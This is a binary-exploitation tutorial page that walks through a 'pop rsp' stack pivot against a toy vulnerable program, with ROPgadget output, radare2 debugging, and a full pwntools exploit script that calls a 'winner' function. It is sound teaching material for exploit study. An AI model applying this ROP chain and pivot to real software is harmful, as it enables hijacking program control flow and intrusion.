pop rsp
Using a pop rsp gadget to stack pivot
Exploitation
Gadgets
FIrst off, let's grab all the gadgets. I'll use ROPgadget
again to do so:
$ ROPgadget --binary vuln | grep 'pop rsp'
0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
$ ROPgadget --binary vuln | grep 'pop rdi'
0x000000000040122b : pop rdi ; ret
$ ROPgadget --binary vuln | grep 'pop rsi'
0x0000000000401229 : pop rsi ; pop r15 ; ret
Now we have all the gadgets, let's chuck them into the script:
POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
Testing the pop
Let's just make sure the pop
works by sending a basic chain and then breaking on ret
and stepping through.
payload = flat(
'A' * 104,
POP_CHAIN,
buffer,
0, # r13
0, # r14
0 # r15
)
pause()
p.sendline(payload)
print(p.recvline())
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it off, attach r2.
$r2 -d -A $(pidof vuln)
[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00
0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68
You may see that only the gadget + 2 more values were written; this is because our buffer length is limited, and this is the reason we need to stack pivot. Let's step through the first pop
.
[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp
0x7ffce2d4fc00
You may notice it's the same as our "leaked" value, so it's working. Now let's try and pop the 0x0
into r13
.
[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141
What? We passed in 0x0
to the gadget!
Remember, however, that pop r13
is equivalent to mov r13, [rsp]
- the value from the top of the stack is moved into r13
. Because we moved RSP, the top of the stack moved to our buffer and AAAAAAAA
was popped into it - because that's what the top of the stack points to now.
Full Payload
Now we understand the intricasies of the pop, let's just finish the exploit off. To account for the additional pop
calls, we have to put some junk at the beginning of the buffer, before we put in the ropchain.
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(104, b'A') # pad to 104
payload += flat(
POP_CHAIN,
buffer # rsp - now stack points to our buffer!
)
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload = payload.ljust(104, b'A') # pad to 104
payload += flat(
POP_CHAIN,
buffer # rsp
)
pause()
p.sendline(payload)
print(p.recvline())
Last updated
Was this helpful?